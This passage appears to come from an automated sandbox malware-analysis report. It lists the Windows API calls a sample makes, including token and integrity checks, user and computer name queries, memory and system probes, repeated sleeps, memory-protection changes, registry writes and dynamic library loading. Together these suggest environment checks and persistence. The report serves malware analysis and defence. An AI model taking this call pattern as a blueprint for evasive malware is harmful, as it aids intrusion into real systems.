      • Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,?,?,00423E3E,00000018,00435890,0000000C,00423ECE,?,?,?,00421317,0000000D,?,0042085F), ref: 00424C61
      • Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
      • Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD
    • SetConsoleCtrlHandler.KERNEL32(Function_00004F04,00000001), ref: 00424115
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,004358D0,00000010), ref: 00424131
    • RtlDecodePointer.NTDLL ref: 00424165
    • RtlEncodePointer.NTDLL(?), ref: 00424173
    • RtlDecodePointer.NTDLL ref: 00424186
    • RtlEncodePointer.NTDLL(?), ref: 00424194
    • RtlDecodePointer.NTDLL ref: 004241A7
    • RtlEncodePointer.NTDLL(?), ref: 004241B5
    • RtlDecodePointer.NTDLL ref: 004241C8
    • RtlEncodePointer.NTDLL(?), ref: 004241D6
    Memory Dump Source
    • Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_41f000_484.jbxd
    APIs
    • WaitForSingleObject.KERNEL32(000000FF), ref: 004072AF
    • GetCurrentProcessId.KERNEL32 ref: 004072D7
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040487E
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404881
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040489A
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040489D
      • Part of subcall function 0040485C: OpenProcess.KERNEL32(00000400,00000000), ref: 004048D1
      • Part of subcall function 0040485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00404907
      • Part of subcall function 0040485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00404921
      • Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00404942
      • Part of subcall function 0040485C: GetLastError.KERNEL32 ref: 00404944
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00404958
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040495B
      • Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00404979
      • Part of subcall function 0040485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0040499D
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00404A0C
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404A0F
      • Part of subcall function 0040485C: GetCursor.USER32 ref: 00404A20
      • Part of subcall function 0040485C: wsprintfW.USER32 ref: 00404A53
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404A6C
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A75
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A7C
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A7F
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(00000000), ref: 00404A84
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(?), ref: 00404A8D
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A9E
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404AA3
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404AA6
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 004072E6
    • HeapAlloc.KERNEL32(00000000), ref: 004072ED
    • GetCurrentProcessId.KERNEL32 ref: 00407300
    • CreateThread.KERNEL32(00000000,00000000,Function_00006C88,00000000,00000000,00000000), ref: 00407311
    • CloseHandle.KERNEL32(00000000), ref: 00407318
    • CreateThread.KERNEL32(00000000,00000000,Function_000070D8,00000000,00000000,00000000), ref: 00407368
    • CloseHandle.KERNEL32(00000000), ref: 0040736F
      • Part of subcall function 0040E0EF: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,001CFDA8), ref: 0040E140
      • Part of subcall function 0040E0EF: HeapAlloc.KERNEL32(00000000), ref: 0040E143
      • Part of subcall function 0040E0EF: GetShellWindow.USER32 ref: 0040E155
      • Part of subcall function 0040E0EF: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 0040E1BD
      • Part of subcall function 0040E0EF: HeapAlloc.KERNEL32(00000000), ref: 0040E1C0
      • Part of subcall function 0040E0EF: ReleaseCapture.USER32 ref: 0040E1D4
      • Part of subcall function 0040E0EF: LoadLibraryA.KERNEL32(?), ref: 0040E1FE
      • Part of subcall function 0040E0EF: GetProcAddress.KERNEL32(00000000), ref: 0040E205
      • Part of subcall function 0040E0EF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E219
      • Part of subcall function 0040E0EF: HeapFree.KERNEL32(00000000), ref: 0040E222
      • Part of subcall function 0040E0EF: GetProcessHeap.KERNEL32(00000000,?), ref: 0040E227
      • Part of subcall function 0040E0EF: HeapFree.KERNEL32(00000000), ref: 0040E22A
      • Part of subcall function 0040E0EF: VirtualAlloc.KERNEL32(00000000,7142424B,00003000,00000004), ref: 0040E261
      • Part of subcall function 0040E0EF: VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040E2E1
    • Sleep.KERNEL32(000003E8), ref: 0040739E
    • Sleep.KERNEL32(0000001E), ref: 004073A2
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,00000000,001CFDA8,001CFDA8,001CFDA8,001CFDA8,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D991
      • Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0040D9AB
      • Part of subcall function 0040D97F: HeapAlloc.KERNEL32(00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9B2
      • Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,7142434B,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D9CD
      • Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000000,00000000,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9DA
      • Part of subcall function 0040D97F: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040D9E1
    • CreateFileW.KERNEL32(001CFDA8,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040DA1F
    • GetFileSize.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA2E
    • GetProcessHeap.KERNEL32(00000008,00000002,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA47
    • HeapAlloc.KERNEL32(00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA4E
    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040DA63
    • GetLastError.KERNEL32(?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA8B
    • CloseHandle.KERNEL32(00000000), ref: 0040DA99
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAB0
    • HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DAB7
    • GetProcessHeap.KERNEL32(00000000,?,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAC3
    • HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DACA
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0040F1FF), ref: 0040E8A6
    • GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,?,?,?,0040F1FF), ref: 0040E8C2
    • GetLastError.KERNEL32(?,0040F1FF), ref: 0040E8D0
    • GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0040F1FF), ref: 0040E8E1
    • HeapAlloc.KERNEL32(00000000,?,0040F1FF), ref: 0040E8E8
    • GetTokenInformation.ADVAPI32(?,00000019,00000000,?,?,?,0040F1FF), ref: 0040E901
    • GetSidSubAuthorityCount.ADVAPI32(00000000,?,0040F1FF), ref: 0040E90D
    • GetSidSubAuthority.ADVAPI32(00000000,?,?,0040F1FF), ref: 0040E924
    • GetProcessHeap.KERNEL32(00000000,00000000,?,0040F1FF), ref: 0040E946
    • HeapFree.KERNEL32(00000000,?,0040F1FF), ref: 0040E94D
    • CloseHandle.KERNEL32(?), ref: 0040E957
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 00404521: GetModuleHandleW.KERNEL32(00000000,7142434B,001CFDA8,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040453A
      • Part of subcall function 00404521: GetCurrentProcess.KERNEL32(00000008,004019F5,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404546
      • Part of subcall function 00404521: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040454D
      • Part of subcall function 00404521: GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 00404570
      • Part of subcall function 00404521: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404572
      • Part of subcall function 00404521: GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404587
      • Part of subcall function 00404521: GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 004045A7
      • Part of subcall function 00404521: ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 004045B7
      • Part of subcall function 00404521: GetProcessHeap.KERNEL32(00000008,00000025), ref: 00404601
      • Part of subcall function 00404521: HeapAlloc.KERNEL32(00000000), ref: 00404608
      • Part of subcall function 00404521: GetCapture.USER32 ref: 00404617
      • Part of subcall function 00404521: StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00404647
      • Part of subcall function 00404521: LocalFree.KERNEL32(76AD46E9), ref: 0040465B
      • Part of subcall function 00404521: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404664
      • Part of subcall function 00404521: HeapFree.KERNEL32(00000000), ref: 0040466B
      • Part of subcall function 00404521: GlobalFree.KERNEL32(00000000), ref: 00404675
      • Part of subcall function 00404521: CloseHandle.KERNEL32(004019F5), ref: 0040467F
      • Part of subcall function 0040BE1A: GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0040BE64
      • Part of subcall function 0040BE1A: HeapAlloc.KERNEL32(00000000), ref: 0040BE6B
      • Part of subcall function 0040BE1A: GetFocus.USER32 ref: 0040BE7C
      • Part of subcall function 0040BE1A: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0040BEB5
      • Part of subcall function 0040BE1A: lstrlenA.KERNEL32(?), ref: 0040BEC9
      • Part of subcall function 0040BE1A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BEEA
      • Part of subcall function 0040BE1A: HeapFree.KERNEL32(00000000), ref: 0040BEF1
    • Sleep.KERNEL32(00002710,76AD46E9,76E6FE8D,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A14
    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A24
      • Part of subcall function 0040E6ED: GetModuleHandleW.KERNEL32(00000000,7142434B,001CFDA8,?,?,?,?,?,?,?,?,00401A31), ref: 0040E6FD
      • Part of subcall function 0040E6ED: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040E703
      • Part of subcall function 0040E6ED: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040E70E
      • Part of subcall function 0040E6ED: GetProcessHeap.KERNEL32(00000008,00000020,?,?,?,?,?,?,?,?,00401A31), ref: 0040E72D
      • Part of subcall function 0040E6ED: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x), ref: 0040E736
      • Part of subcall function 0040E6ED: GetComputerNameW.KERNEL32(00000000,?), ref: 0040E751
      • Part of subcall function 0040E6ED: GetProcessHeap.KERNEL32(00000008,0000001D,?), ref: 0040E78C
      • Part of subcall function 0040E6ED: HeapAlloc.KERNEL32(00000000), ref: 0040E78F
      • Part of subcall function 0040E6ED: GetClipboardOwner.USER32 ref: 0040E79C
      • Part of subcall function 0040E6ED: lstrcpyW.KERNEL32(00000000), ref: 0040E7CF
      • Part of subcall function 0040E6ED: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E7DE
      • Part of subcall function 0040E6ED: HeapFree.KERNEL32(00000000), ref: 0040E7E1
      • Part of subcall function 0040E6ED: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040E80F
      • Part of subcall function 0040E6ED: CheckTokenMembership.ADVAPI32(00000000,?,00401A31), ref: 0040E82A
      • Part of subcall function 0040E6ED: FreeSid.ADVAPI32(?), ref: 0040E836
      • Part of subcall function 0040E6ED: CreateWellKnownSid.ADVAPI32(00000027,00000000,?,00401A31), ref: 0040E866
      • Part of subcall function 0040E6ED: CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0040E87C
      • Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,001CFDA8), ref: 00404237
      • Part of subcall function 004041E5: HeapAlloc.KERNEL32(00000000), ref: 0040423A
      • Part of subcall function 004041E5: GetShellWindow.USER32 ref: 00404255
      • Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 004042AC
      • Part of subcall function 004041E5: HeapAlloc.KERNEL32(00000000), ref: 004042AF
      • Part of subcall function 004041E5: GetDoubleClickTime.USER32 ref: 004042CD
      • Part of subcall function 004041E5: LoadLibraryA.KERNEL32(?), ref: 004042F7
      • Part of subcall function 004041E5: GetProcAddress.KERNEL32(00000000), ref: 004042FE
      • Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000008,00000014), ref: 00404376
      • Part of subcall function 004041E5: HeapAlloc.KERNEL32(00000000), ref: 00404379
      • Part of subcall function 004041E5: GetDialogBaseUnits.USER32 ref: 00404390
      • Part of subcall function 004041E5: LoadLibraryA.KERNEL32(?), ref: 004043BA
      • Part of subcall function 004041E5: GetProcAddress.KERNEL32(00000000), ref: 004043C1
      • Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00404419
      • Part of subcall function 004041E5: HeapAlloc.KERNEL32(00000000), ref: 0040441C
      • Part of subcall function 004041E5: CloseClipboard.USER32 ref: 00404433
      • Part of subcall function 004041E5: LoadLibraryA.KERNEL32(?), ref: 0040445D
      • Part of subcall function 004041E5: GetProcAddress.KERNEL32(00000000), ref: 00404464
      • Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000008,00401A39), ref: 00404487
      • Part of subcall function 004041E5: HeapAlloc.KERNEL32(00000000), ref: 0040448A
      • Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000000,00000005), ref: 004044C8
      • Part of subcall function 004041E5: HeapFree.KERNEL32(00000000), ref: 004044CB
      • Part of subcall function 004041E5: CloseHandle.KERNEL32(?), ref: 004044D4
      • Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004044DD
      • Part of subcall function 004041E5: HeapFree.KERNEL32(00000000), ref: 004044E0
      • Part of subcall function 004041E5: CloseHandle.KERNEL32(?), ref: 004044EC
      • Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004044F5
      • Part of subcall function 004041E5: HeapFree.KERNEL32(00000000), ref: 004044F8
      • Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404504
      • Part of subcall function 004041E5: HeapFree.KERNEL32(00000000), ref: 0040450D
      • Part of subcall function 004041E5: GetProcessHeap.KERNEL32(00000000,?), ref: 00404512
      • Part of subcall function 004041E5: HeapFree.KERNEL32(00000000), ref: 00404515
      • Part of subcall function 0040BF00: GetProcessHeap.KERNEL32(00000008,00000015,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040BF97
      • Part of subcall function 0040BF00: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040BF9A
      • Part of subcall function 0040BF00: GetFocus.USER32 ref: 0040BFAB
      • Part of subcall function 0040BF00: lstrcatW.KERNEL32(00000000), ref: 0040BFDE
      • Part of subcall function 0040BF00: GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040C012
      • Part of subcall function 0040BF00: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040C042
      • Part of subcall function 0040BF00: HeapFree.KERNEL32(00000000), ref: 0040C045
    • VirtualProtect.KERNEL32(00412000,00000184,00000040,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A85
    • VirtualProtect.KERNEL32(00412000,00000184,?,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401A9F
      • Part of subcall function 0040FCD2: GetProcessHeap.KERNEL32(00000008,0000004D,00412000,7142434B,001CFDA8), ref: 0040FD46
      • Part of subcall function 0040FCD2: HeapAlloc.KERNEL32(00000000), ref: 0040FD49
      • Part of subcall function 0040FCD2: GetDialogBaseUnits.USER32 ref: 0040FD64
      • Part of subcall function 0040FCD2: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,000F003F,00000000), ref: 0040FD98
      • Part of subcall function 0040FCD2: GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0040FDFD
      • Part of subcall function 0040FCD2: HeapAlloc.KERNEL32(00000000), ref: 0040FE00
      • Part of subcall function 0040FCD2: CloseClipboard.USER32 ref: 0040FE14
      • Part of subcall function 0040FCD2: RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,?,00000004), ref: 0040FE47
      • Part of subcall function 0040FCD2: RegCloseKey.ADVAPI32(00000000), ref: 0040FE50
      • Part of subcall function 0040FCD2: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FE5F
      • Part of subcall function 0040FCD2: HeapFree.KERNEL32(00000000), ref: 0040FE62
      • Part of subcall function 0040FCD2: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FE6E
      • Part of subcall function 0040FCD2: HeapFree.KERNEL32(00000000), ref: 0040FE71
    • GlobalAddAtomW.KERNEL32 ref: 00401ABF
    • AddAtomW.KERNEL32 ref: 00401ACB
      • Part of subcall function 0040D9F1: CreateFileW.KERNEL32(001CFDA8,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040DA1F
      • Part of subcall function 0040D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA2E
      • Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA47
      • Part of subcall function 0040D9F1: HeapAlloc.KERNEL32(00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA4E
      • Part of subcall function 0040D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040DA63
      • Part of subcall function 0040D9F1: GetLastError.KERNEL32(?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA8B
      • Part of subcall function 0040D9F1: CloseHandle.KERNEL32(00000000), ref: 0040DA99
      • Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAB0
      • Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DAB7
      • Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAC3
      • Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DACA
      • Part of subcall function 0040E684: GetModuleHandleA.KERNEL32(?,?), ref: 0040E6BD
      • Part of subcall function 0040E684: GetProcAddress.KERNEL32(00000000), ref: 0040E6C4
      • Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000008,00000208,7142434B), ref: 004016C4
      • Part of subcall function 004016A9: HeapAlloc.KERNEL32(00000000), ref: 004016C7
      • Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000008,0000009D), ref: 004017AA
      • Part of subcall function 004016A9: HeapAlloc.KERNEL32(00000000), ref: 004017AD
      • Part of subcall function 004016A9: GetActiveWindow.USER32 ref: 004017C1
      • Part of subcall function 004016A9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 004017F0
      • Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000008,00000039), ref: 00401836
      • Part of subcall function 004016A9: HeapAlloc.KERNEL32(00000000), ref: 0040183D
      • Part of subcall function 004016A9: GetCaretBlinkTime.USER32 ref: 00401854
      • Part of subcall function 004016A9: StrStrIW.SHLWAPI(?,00000000), ref: 0040187E
      • Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000008,00000051), ref: 004018ED
      • Part of subcall function 004016A9: HeapAlloc.KERNEL32(00000000), ref: 004018F4
      • Part of subcall function 004016A9: GetModuleHandleW.KERNEL32(00000000), ref: 0040190A
      • Part of subcall function 004016A9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00401939
      • Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401942
      • Part of subcall function 004016A9: HeapFree.KERNEL32(00000000), ref: 00401949
      • Part of subcall function 004016A9: StrCatW.SHLWAPI(?), ref: 0040195C
      • Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0040199E
      • Part of subcall function 004016A9: HeapFree.KERNEL32(00000000), ref: 004019A1
      • Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019AA
      • Part of subcall function 004016A9: HeapFree.KERNEL32(00000000), ref: 004019B3
      • Part of subcall function 004016A9: GetProcessHeap.KERNEL32(00000000,?), ref: 004019B8
      • Part of subcall function 004016A9: HeapFree.KERNEL32(00000000), ref: 004019BB
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,KCBqiNhR7x,0040F467), ref: 00401AFB
    • HeapFree.KERNEL32(00000000), ref: 00401B02
      • Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040C0CB
      • Part of subcall function 0040C055: HeapAlloc.KERNEL32(00000000), ref: 0040C0CE
      • Part of subcall function 0040C055: IsSystemResumeAutomatic.KERNEL32 ref: 0040C0FA
      • Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040C162
      • Part of subcall function 0040C055: HeapAlloc.KERNEL32(00000000), ref: 0040C165
      • Part of subcall function 0040C055: GetClipboardSequenceNumber.USER32 ref: 0040C18A
      • Part of subcall function 0040C055: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040C1C0
      • Part of subcall function 0040C055: GetProcAddress.KERNEL32(00000000), ref: 0040C1C7
      • Part of subcall function 0040C055: GlobalMemoryStatusEx.KERNEL32(?), ref: 0040C1E2
      • Part of subcall function 0040C055: GetSystemInfo.KERNEL32(?), ref: 0040C1F8
      • Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000008,000000BD), ref: 0040C30F
      • Part of subcall function 0040C055: HeapAlloc.KERNEL32(00000000), ref: 0040C312
      • Part of subcall function 0040C055: GetDesktopWindow.USER32 ref: 0040C32E
      • Part of subcall function 0040C055: RegOpenKeyW.ADVAPI32(80000002,00000000,?), ref: 0040C365
      • Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000008,00000051), ref: 0040C3E0
      • Part of subcall function 0040C055: HeapAlloc.KERNEL32(00000000), ref: 0040C3E7
      • Part of subcall function 0040C055: GetClipboardViewer.USER32 ref: 0040C403
      • Part of subcall function 0040C055: RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0040C448
      • Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040C4A1
      • Part of subcall function 0040C055: HeapAlloc.KERNEL32(00000000), ref: 0040C4A8
      • Part of subcall function 0040C055: CountClipboardFormats.USER32 ref: 0040C4C0
      • Part of subcall function 0040C055: StrStrIW.SHLWAPI(?,00000000), ref: 0040C4F8
      • Part of subcall function 0040C055: Sleep.KERNEL32(00002710), ref: 0040C505
      • Part of subcall function 0040C055: StrStrIW.SHLWAPI(?,00000000), ref: 0040C514
      • Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C51C
      • Part of subcall function 0040C055: HeapFree.KERNEL32(00000000), ref: 0040C529
      • Part of subcall function 0040C055: RegCloseKey.ADVAPI32(?), ref: 0040C536
      • Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C540
      • Part of subcall function 0040C055: HeapFree.KERNEL32(00000000), ref: 0040C547
      • Part of subcall function 0040C055: Sleep.KERNEL32(00002710), ref: 0040C56E
      • Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C59A
      • Part of subcall function 0040C055: HeapFree.KERNEL32(00000000), ref: 0040C59D
      • Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000000,?), ref: 0040C5A3
      • Part of subcall function 0040C055: HeapFree.KERNEL32(00000000), ref: 0040C5A6
      • Part of subcall function 0040C055: GetProcessHeap.KERNEL32(00000000,?), ref: 0040C5B2
      • Part of subcall function 0040C055: HeapFree.KERNEL32(00000000), ref: 0040C5B5
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000000D,?,7142434B,001CFDA8), ref: 0040A9CF
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040A9D2
      • Part of subcall function 0040A98B: GetCapture.USER32 ref: 0040A9F3
      • Part of subcall function 0040A98B: GetModuleHandleA.KERNEL32(00000000), ref: 0040AA19
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040AA54
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AA57
      • Part of subcall function 0040A98B: GetOpenClipboardWindow.USER32 ref: 0040AA75
      • Part of subcall function 0040A98B: GetModuleHandleA.KERNEL32(00000000), ref: 0040AA9B
      • Part of subcall function 0040A98B: GetUserNameA.ADVAPI32(0041CDF0,?), ref: 0040AAC6
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040AAF9
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AAFC
      • Part of subcall function 0040A98B: GetClipboardViewer.USER32 ref: 0040AB16
      • Part of subcall function 0040A98B: lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040AB41
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AB78
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AB7B
      • Part of subcall function 0040A98B: GetFocus.USER32 ref: 0040AB95
      • Part of subcall function 0040A98B: lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040ABC1
      • Part of subcall function 0040A98B: GetComputerNameA.KERNEL32(0041CDF0,00000400), ref: 0040ABE8
      • Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AC16
      • Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040AC19
      • Part of subcall function 0040A98B: GetCursor.USER32 ref: 0040AC30
      • Part of subcall function 0040A98B: lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040AC5B
